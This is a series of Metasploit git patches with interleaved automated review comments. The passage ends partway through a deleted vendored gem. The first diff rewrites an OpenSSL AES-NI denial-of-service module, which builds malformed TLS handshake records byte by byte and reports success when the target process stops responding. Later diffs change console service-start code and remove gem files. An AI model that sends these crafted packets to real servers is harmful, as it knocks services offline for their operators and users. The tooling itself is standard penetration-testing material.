@@ -28,74 +28,105 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(443), - OptInt.new('MAX_TRIES', [false, "Maximum number of tries", 300]) + OptInt.new('MAX_TRIES', [true, "Maximum number of tries", 300]) ], self.class) end def run # Client Hello - p1 = - "\x16\x03\x01\x00\x7e\x01\x00\x00\x7a\x03\x02\x50\xeb\xf2\x4a\xaf"<< - "\x74\xf5\xe3\x55\x6a\xae\xcf\x88\x36\x7c\xd9\xe5\x1b\xcc\x09\xee"<< - "\x6f\x42\x30\x3b\x49\x55\xf8\xaa\x11\x32\xeb\x00\x00\x08\xc0\x13"<< - "\x00\x39\x00\x35\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00"<< - "\x01\x02\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b"<< - "\x00\x0c\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06"<< - "\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01"<< - "\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f"<< - "\x00\x01\x01" + p1 = "\x16" # Content Type: Handshake + p1 << "\x03\x01" # Version: TLS 1.0 + p1 << "\x00\x7e" # Length: 126 + p1 << "\x01" # Handshake Type: Client Hello + p1 << "\x00\x00\x7a" # Length: 122 + p1 << "\x03\x02" # Version: TLS 1.1 + p1 << ("A" * 32) # Random + p1 << "\x00" # Session ID Length: 0 + p1 << "\x00\x08" # Cypher Suites Length: 6 + p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA + p1 << "\x00\x39" # - DHE-RSA-AES256-SHA + p1 << "\x00\x35" # - AES256-SHA + p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV + p1 << "\x01" # Compression Methods Length: 1 + p1 << "\x00" # - NULL-Compression + p1 << "\x00\x49" # Extensions Length: 73 + p1 << "\x00\x0b" # - Extension: ec_point_formats + p1 << "\x00\x04" # Length: 4 + p1 << "\x03" # EC Points Format Length: 3 + p1 << "\x00" # - uncompressed + p1 << "\x01" # - ansiX962_compressed_prime + p1 << "\x02" # - ansiX962_compressed_char2 + p1 << "\x00\x0a" # - Extension: elliptic_curves + p1 << "\x00\x34" # Length: 52 + p1 << "\x00\x32" # Elliptic Curves Length: 50 + # 25 Elliptic curves: + p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a" + p1 << 
"\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04" + p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10" + p1 << "\x00\x11" + + p1 << "\x00\x23" # - Extension: SessionTicket TLS + p1 << "\x00\x00" # Length: 0 + p1 << "\x00\x0f" # - Extension: Heartbeat + p1 << "\x00\x01" # Length: 1 + p1 << "\x01" # Peer allowed to send requests + + + # Change Cipher Spec Message + p2_cssm = "\x14" # Content Type: Change Cipher Spec + p2_cssm << "\x03\x02" # Version: TLS 1.1 + p2_cssm << "\x00\x01" # Length: 1 + p2_cssm << "\x01" # Change Cipher Spec Message + + + # Encrypted Handshake Message + p2_ehm = "\x16" # Content Type: Handshake + p2_ehm << "\x03\x02" # Version: TLS 1.1 + p2_ehm << "\x00\x40" # Length: 64 + p2_ehm << ("A" * 64) # Encrypted Message + # Client Key Exchange, Change Cipher Spec, Encrypted Handshake # AES256-SHA - p2_aes_sha = - "\x16\x03\x02\x01\x06\x10\x00\x01\x02\x01\x00\x4c\xee\x18\xe2\xec"<< - "\xa9\x9d\xd7\x10\xd0\xff\x6f\xa8\x10\xf5\x9c\xa0\x91\x38\x93\x93"<< - "\xaa\x71\x07\x69\xb6\x22\x81\x2d\xcd\xe0\x8f\x95\xf2\x9b\xaa\x49"<< - "\x18\x15\x53\xc3\x34\x15\x81\xab\x20\x72\x16\x5b\xf2\xca\x13\x9e"<< - "\x11\x6e\x3c\xf5\x71\x7c\x19\xf4\x7d\x35\x71\x25\x6e\xbe\xee\xdf"<< - "\x1d\x55\xc9\x38\xac\xbb\x88\xab\xd0\x18\x7d\x5f\xaa\x3c\x91\x2f"<< - "\xd2\x64\x7c\x15\x91\xa6\xe7\xb7\x0c\x01\xb3\xc7\x37\xc1\x3a\xb2"<< - "\xde\x59\x6e\x8f\x7a\xde\x22\x59\x6c\xb7\x91\x21\x8f\xff\x56\x2c"<< - "\x5f\xfb\x54\x7f\xd1\x1a\x00\x0e\x02\xb2\x4e\x62\xfd\xe2\xc0\x8f"<< - "\x56\x52\x8a\x4c\x44\x01\x5f\x21\xf9\xd5\xb3\xeb\xab\x39\xcf\x4e"<< - "\xed\x78\xad\xea\xc7\x43\x80\x3f\xf2\x41\xbe\x5c\x83\xa5\x54\x6f"<< - "\x3c\xfb\x15\xed\x3c\x83\xf0\x3b\xd2\x7c\x5d\xf6\x82\xcb\x82\xb6"<< - "\x6a\x8e\x94\xf9\x22\x5a\x17\x20\x82\x21\x4e\x83\x01\x81\x06\x9e"<< - "\x21\xba\x16\xa4\xda\xcd\x8e\x1c\x8c\xe7\x19\x96\x2a\xec\x90\x6a"<< - "\x16\xac\x12\x68\xbd\xf7\x4b\x6c\x3c\x91\x8b\xe7\x34\x03\x91\x65"<< - 
"\x61\x57\xbc\x3a\x66\x3b\x7b\xb1\x57\xcd\x19\x5c\x4a\x69\x43\xb2"<< - "\x67\xaf\x38\x5c\x1a\x7e\x80\x78\x90\x25\xb8\x14\x03\x02\x00\x01"<< - "\x01\x16\x03\x02\x00\x40\x7d\xf4\x2c\x8c\x64\x74\xa5\x98\x02\x41"<< - "\xac\x97\xfd\x53\x15\x4c\xbf\x16\x08\x26\xe0\x6c\x22\x70\x5f\x36"<< - "\x75\x75\x96\xf9\x6b\x9f\xb4\xc3\x38\xa7\x14\xac\x21\x89\xec\xd6"<< - "\x37\x28\xf3\x0d\xdf\xb3\x1b\xac\x96\xf3\x16\x5c\xc3\x6b\x71\x1c"<< - "\xdb\x0d\x04\x96\x21\xd2" + p2_aes_sha = "\x16" # Content Type: Handshake + p2_aes_sha << "\x03\x02" # Version: TLS 1.1 + p2_aes_sha << "\x01\x06" # Length: 262 + p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange + p2_aes_sha << "\x00\x01\x02" # Length: 258 + p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256 + p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant) + p2_aes_sha << p2_cssm # Change Cipher Spec Message + p2_aes_sha << p2_ehm # Encrypted Handshake Message + # DHE-RSA-AES256-SHA - p2_dhe_rsa_aes256_sha = - "\x16\x03\x02\x00\x46\x10\x00\x00\x42\x00\x40\x43\xaf\x48\x16\x8d"<< - "\x17\xb9\xb0\xb6\xbc\x68\xab\x99\xf9\x30\xc9\xb1\xa2\x3b\x4f\x79"<< - "\xaa\x76\x5c\x0d\x61\xa0\x19\x55\x11\x20\xe8\xbb\xab\x69\xf3\xeb"<< - "\xff\x81\x1d\x16\x0d\x03\xaf\xb9\x70\xae\x72\x5c\xd8\xc7\x28\x2c"<< - "\xac\xd5\x84\x2c\xaf\x2a\x57\x46\x71\xca\x73\x14\x03\x02\x00\x01"<< - "\x01\x16\x03\x02\x00\x40\xff\x62\x0f\x7a\xb2\x79\xfe\x78\xce\xb9"<< - "\xde\xc4\xef\x66\x2f\xed\x1a\x37\xfe\x47\xdd\xde\x9c\xe0\x42\xbc"<< - "\x93\x20\x65\x05\xd3\x50\x14\x1c\x6c\xb1\x7a\x3a\x7d\x91\x92\xbb"<< - "\x9d\x42\x78\xbf\xe4\x08\xa0\xfd\x9c\xeb\x24\x29\x3b\xed\xc8\x54"<< - "\x3d\xd3\xa2\xff\xb0\x8b" + p2_dhe = "\x16" # Content Type: Handshake + p2_dhe << "\x03\x02" # Version: TLS 1.1 + p2_dhe << "\x00\x46" # Length: 70 + p2_dhe << "\x10" # Handshake Type: Client Key Exchange + p2_dhe << "\x00\x00\x42" # Length: 66 + p2_dhe << "\x00\x40" # DH Pubkey Length: 64 + p2_dhe << ("A" * 64) # DH Pubkey + p2_dhe << p2_cssm # Change Cipher Spec Message + 
p2_dhe << p2_ehm # Encrypted Handshake Message + # ECDHE-RSA-AES128-SHA - p2_ecdhe_rsa_aes128_sha = - "\x16\x03\x02\x00\x46\x10\x00\x00\x42\x41\x04\x2f\x22\xf4\x06\x3f"<< - "\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8\x03\xe5\xaa\x36\xeb\x0f"<< - "\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69\x5b\x38\x95\x58\xb6\x0d"<< - "\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6\xb2\xe6\x8b\x2a\xd9\x03"<< - "\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73\x40\x14\x03\x02\x00\x01"<< - "\x01\x16\x03\x02\x00\x40\x8c\xc6\x4d\xdc\x42\x03\x64\xa3\xc0\xf4"<< - "\x94\xda\xa4\x12\x68\x78\xfd\x5b\x44\xaf\xa3\x91\x63\x75\x26\x93"<< - "\x14\xad\x86\xa7\x4f\x5a\x2e\xcb\x13\x17\xb7\xdf\x67\x64\x1b\x10"<< - "\xc3\x9f\x68\xaf\x92\x38\xbf\x67\xc6\x18\x5b\x78\xc9\x99\xc3\x70"<< - "\x89\x09\xe2\x3f\x3e\x1f" + p2_ecdhe = "\x16" # Content Type: Handshake + p2_ecdhe << "\x03\x02" # Version: TLS 1.1 + p2_ecdhe << "\x00\x46" # Length: 70 + p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange + p2_ecdhe << "\x00\x00\x42" # Length: 66 + p2_ecdhe << "\x41" # EC DH Pubkey Length: 65 + # EC DH Pubkey: + p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8" + p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69" + p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6" + p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73" + p2_ecdhe << "\x40" + p2_ecdhe << p2_cssm # Change Cipher Spec Message + p2_ecdhe << p2_ehm # Encrypted Handshake Message + maxtries = datastore['MAX_TRIES'] @@ -112,9 +143,9 @@ class Metasploit4 < Msf::Auxiliary cs = get_cipher_suite(resp) if cs == 0xc013 # ECDHE-RSA-AES128-SHA - p2 = p2_ecdhe_rsa_aes128_sha + p2 = p2_ecdhe elsif cs == 0x0039 # DHE-RSA-AES256-SHA - p2 = p2_dhe_rsa_aes256_sha + p2 = p2_dhe elsif cs == 0x0035 # AES256-SHA p2 = p2_aes_sha else 
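Review bot: In the Client Hello built in the `@@ -28,74 +28,105 @@` hunk of openssl_aesni.rb, the comment on `p1 << "\x00\x08"` says `Cypher Suites Length: 6`, but the value is 8 and four two-byte suite ids follow it. Since the purpose of the commit is to describe every field, the comment should read `# Cipher Suites Length: 8`. `Encrypted PresMaster` in the AES256-SHA block is a typo for `PreMaster`. The other length comments checked against their bytes (extensions 73, elliptic curves 50) agree. `run` starts before the hunk and continues after it.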
@@ -126,17 +157,16 @@ class Metasploit4 < Msf::Auxiliary alert = nil - timeout(2) do - alert = sock.recv(4096) - end - - disconnect - - if alert == '' + begin + alert = sock.get_once(-1, 2) + rescue EOFError print_status("DoS successful. process on #{rhost} did not respond.") success = true break end + + disconnect + end if success == false @@ -157,7 +187,7 @@ class Metasploit4 < Msf::Auxiliary len = (resp[offset+3, 2]).unpack("n")[0] hstype = (resp[offset+5, 1]).unpack("C")[0] - if hstype == 2 + if hstype == 2 # Server Hello return (resp[offset+44, 2]).unpack("n")[0] end From fb0237a180eccba807c5e3386fb9f740a866ace7 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Mon, 4 Mar 2013 18:26:59 -0600 Subject: [PATCH 74/87] Fix typo --- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 2e24232fe4..04c3696415 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2642,7 +2642,7 @@ class Core if is_metasploit_service_running launch_metasploit_browser else - print_error "Metasploit services aren't running. Type 'service start metasploit' and try again." + print_error "Metasploit services aren't running. Type 'service metasploit start' and try again." end end return true From 370aed5973f603ddff5a903716182954d93ce5b2 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Mon, 4 Mar 2013 18:27:22 -0600 Subject: [PATCH 75/87] Silence status output, it is distracting --- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 04c3696415..62edace397 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
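Review bot: In the `@@ -126,17 +157,16 @@` hunk, the `rescue EOFError` branch reaches `break` before `disconnect`, so the socket of the last iteration is not closed by this code, whereas the replaced version called `disconnect` before testing the result. Putting the call in an `ensure` clause of the same `begin` block restores cleanup on both paths. `alert` is assigned but not read in the lines shown, and the status text says the process "did not respond" although the branch fires on end-of-file, so the message and the condition it reports do not match. The loop starts outside the hunk.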
@@ -2704,7 +2704,7 @@ class Core def is_metasploit_service_running cmd = "/usr/sbin/service" - system(cmd, "metasploit", "status") # Both running returns true, otherwise, false. + system("#{cmd} metasploit status >/dev/null") # Both running returns true, otherwise, false. end def is_metasploit_debian_package_installed From 4e31187f7218c260dcea1235b2a51d3cb556f9f2 Mon Sep 17 00:00:00 2001 From: Brandon Turner Date: Mon, 4 Mar 2013 18:35:47 -0600 Subject: [PATCH 76/87] Use start.sh to start Pro via go_pro command start.sh (installed with community/pro on apt installs) automatically starts dependency services (such as postgresql). --- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 62edace397..4b1bbb5fe0 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2695,9 +2695,9 @@ class Core end def start_metasploit_service - cmd = "/usr/sbin/service" + cmd = File.expand_path(File.join(msfbase_dir, '..', '..', '..', 'scripts', 'start.sh')) return unless ::File.executable_real? cmd - %x{#{cmd} metasploit start}.each_line do |line| + %x{#{cmd}}.each_line do |line| print_status line.chomp end end From c639de7ccc2806110e30530aec1a689a8b293964 Mon Sep 17 00:00:00 2001 
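Review bot: The new `system("#{cmd} metasploit status >/dev/null")` in the `@@ -2704,7 +2704,7 @@` hunk of core.rb goes through the shell only to discard stdout, while the argv form it replaces ran the binary directly. On Ruby 1.9 and later `system(cmd, "metasploit", "status", :out => "/dev/null")` silences the output and keeps the no-shell call, so the line stays safe if `cmd` ever stops being a literal. stderr is still printed in both forms; add `:err => "/dev/null"` if that should be quiet too. The trailing comment `# Both running returns true, otherwise, false.` could say which two services are meant.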
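Review bot: In `start_metasploit_service` (the `@@ -2695,9 +2695,9 @@` hunk), `%x{#{cmd}}` hands the expanded install path to the shell unquoted, so a base directory containing a space or a shell metacharacter is split or misparsed instead of being run as one path. The `::File.executable_real? cmd` check on the line before tests the real path, not what the shell will see. `IO.popen([cmd]) { |io| io.each_line { |line| print_status line.chomp } }` runs the script without a shell on Ruby 1.9 and later, or the path can be passed through `Shellwords.escape`. A short comment on what layout the three `'..'` segments assume relative to `msfbase_dir` would also help, since the method returns silently when start.sh is not found there.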
From: David Maloney Date: Tue, 5 Mar 2013 12:33:37 -0600 Subject: [PATCH 77/87] fix a major typo snaffu --- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 -- .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 - .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 - .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 --- .../gems/method_source-0.7.1/README.markdown | 91 ---------- .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 -------- .../method_source-0.7.1/lib/method_source.rb | 163 ------------------ .../lib/method_source/source_location.rb | 138 --------------- .../lib/method_source/version.rb | 3 - .../method_source-0.7.1/method_source.gemspec | 33 ---- .../gems/method_source-0.7.1/test/test.rb | 122 ------------- .../method_source-0.7.1/test/test_helper.rb | 50 ------ lib/msf/core/auxiliary/web/http.rb | 7 +- 14 files changed, 3 insertions(+), 725 deletions(-) delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec delete mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb delete mode 100644 
lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml deleted file mode 100644 index ba51bba6b2..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml +++ /dev/null @@ -1,17 +0,0 @@ -rvm: - - 1.8.7 - - 1.9.2 - - 1.9.3 - - ree - - rbx-18mode - - rbx-19mode - - jruby - -notifications: - irc: "irc.freenode.org#pry" - recipients: - - jrmair@gmail.com - -branches: - only: - - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts deleted file mode 100644 index a4e7838016..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts +++ /dev/null @@ -1 +0,0 @@ --m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile deleted file mode 100644 index e45e65f871..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile +++ /dev/null @@ -1,2 +0,0 @@ -source :rubygems -gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE deleted file mode 100644 index d1a50d62d0..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE +++ /dev/null 
@@ -1,25 +0,0 @@ -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown deleted file mode 100644 index d91b810a3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown +++ /dev/null 
@@ -1,91 +0,0 @@ -method_source -============= - -(C) John Mair (banisterfiend) 2011 - -_retrieve the sourcecode for a method_ - -*NOTE:* This simply utilizes `Method#source_location`; it - does not access the live AST. - -`method_source` is a utility to return a method's sourcecode as a -Ruby string. Also returns `Proc` and `Lambda` sourcecode. - -Method comments can also be extracted using the `comment` method. - -It is written in pure Ruby (no C). - -* Some Ruby 1.8 support now available. -* Support for MRI, RBX, JRuby, REE - -`method_source` provides the `source` and `comment` methods to the `Method` and -`UnboundMethod` and `Proc` classes. - -* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` -* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) -* See the [source code](http://github.com/banister/method_source) - -Example: display method source ------------------------------- - - Set.instance_method(:merge).source.display - # => - def merge(enum) - if enum.instance_of?(self.class) - @hash.update(enum.instance_variable_get(:@hash)) - else - do_with_enum(enum) { |o| add(o) } - end - - self - end - -Example: display method comments --------------------------------- - - Set.instance_method(:merge).comment.display - # => - # Merges the elements of the given enumerable object to the set and - # returns self. - -Limitations: ------------- - -* Occasional strange behaviour in Ruby 1.8 -* Cannot return source for C methods. -* Cannot return source for dynamically defined methods. - -Special Thanks --------------- - -[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. - -[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. - -[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. 
- -License -------- - -(The MIT License) - -Copyright (c) 2011 John Mair (banisterfiend) - -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -'Software'), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. -IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY -CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, -TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile deleted file mode 100644 index 92c0234f3b..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile +++ /dev/null 
@@ -1,76 +0,0 @@ -dlext = Config::CONFIG['DLEXT'] -direc = File.dirname(__FILE__) - -require 'rake/clean' -require 'rake/gempackagetask' -require "#{direc}/lib/method_source/version" - -CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") -CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", - "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", - "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") - -def apply_spec_defaults(s) - s.name = "method_source" - s.summary = "retrieve the sourcecode for a method" - s.version = MethodSource::VERSION - s.date = Time.now.strftime '%Y-%m-%d' - s.author = "John Mair (banisterfiend)" - s.email = 'jrmair@gmail.com' - s.description = s.summary - s.require_path = 'lib' - - s.add_development_dependency("bacon","~>1.1.0") - s.add_development_dependency("rake", "~>0.9") - s.homepage = "http://banisterfiend.wordpress.com" - s.has_rdoc = 'yard' - s.files = `git ls-files`.split("\n") - s.test_files = `git ls-files -- test/*`.split("\n") -end - -task :test do - sh "bacon -q #{direc}/test/test.rb" -end - -desc "reinstall gem" -task :reinstall => :gems do - sh "gem uninstall method_source" rescue nil - sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" -end - -desc "Set up and run tests" -task :default => [:test] - -namespace :ruby do - spec = Gem::Specification.new do |s| - apply_spec_defaults(s) - s.platform = Gem::Platform::RUBY - end - - Rake::GemPackageTask.new(spec) do |pkg| - pkg.need_zip = false - pkg.need_tar = false - end - - desc "Generate gemspec file" - task :gemspec do - File.open("#{spec.name}.gemspec", "w") do |f| - f << spec.to_ruby - end - end -end - -desc "build all platform gems at once" -task :gems => [:rmgems, "ruby:gem"] - -desc "remove all platform gems" -task :rmgems => ["ruby:clobber_package"] - -desc "build and push latest gems" -task :pushgems => :gems do - chdir("#{direc}/pkg") do - Dir["*.gem"].each do |gemfile| - sh "gem push #{gemfile}" 
- end - end -end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb deleted file mode 100644 index 9a3c325f75..0000000000 --- a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb +++ /dev/null 
@@ -1,163 +0,0 @@ -# (C) John Mair (banisterfiend) 2011 -# MIT License - -direc = File.dirname(__FILE__) - -require "#{direc}/method_source/version" -require "#{direc}/method_source/source_location" - -module MethodSource - # Determine if a string of code is a valid Ruby expression. - # @param [String] code The code to validate. - # @return [Boolean] Whether or not the code is a valid Ruby expression. - # @example - # valid_expression?("class Hello") #=> false - # valid_expression?("class Hello; end") #=> true - def self.valid_expression?(str) - if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ - Rubinius::Melbourne19.parse_string(str) - elsif defined?(Rubinius::Melbourne) - Rubinius::Melbourne.parse_string(str) - else - catch(:valid) { - eval("BEGIN{throw :valid}\n#{str}") - } - end - true - rescue SyntaxError - false - end - - # Helper method responsible for extracting method body. - # Defined here to avoid polluting `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [File] The opened source file - def self.source_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - (line - 1).times { file.readline } - - code = "" - loop do - val = file.readline - code << val - - return code if valid_expression?(code) - end - end - end - - # Helper method responsible for opening source file and buffering up - # the comments for a specified method. Defined here to avoid polluting - # `Method` class. - # @param [Array] source_location The array returned by Method#source_location - # @return [String] The comments up to the point of the method. 
- def self.comment_helper(source_location) - return nil if !source_location.is_a?(Array) - - file_name, line = source_location - File.open(file_name) do |file| - buffer = "" - (line - 1).times do - line = file.readline - # Add any line that is a valid ruby comment, - # but clear as soon as we hit a non comment line. - if (line =~ /^\s*#/) || (line =~ /^\s*$/) - buffer << line.lstrip - else - buffer.replace("") - end - end - - buffer - end - end - - # This module is to be included by `Method` and `UnboundMethod` and - # provides the `#source` functionality - module MethodExtensions - - # We use the included hook to patch Method#source on rubinius. - # We need to use the included hook as Rubinius defines a `source` - # on Method so including a module will have no effect (as it's - # higher up the MRO). - # @param [Class] klass The class that includes the module. - def self.included(klass) - if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && - RUBY_ENGINE =~ /rbx/ - - klass.class_eval do - orig_source = instance_method(:source) - - define_method(:source) do - begin - super - rescue - orig_source.bind(self).call - end - end - - end - end - end - - # Return the sourcecode for the method as a string - # (This functionality is only supported in Ruby 1.9 and above) - # @return [String] The method sourcecode as a string - # @example - # Set.instance_method(:clear).source.display - # => - # def clear - # @hash.clear - # self - # end - def source - if respond_to?(:source_location) - source = MethodSource.source_helper(source_location) - - raise "Cannot locate source for this method: #{name}" if !source - else - raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" - end - - source - end - - # Return the comments associated with the method as a string. 
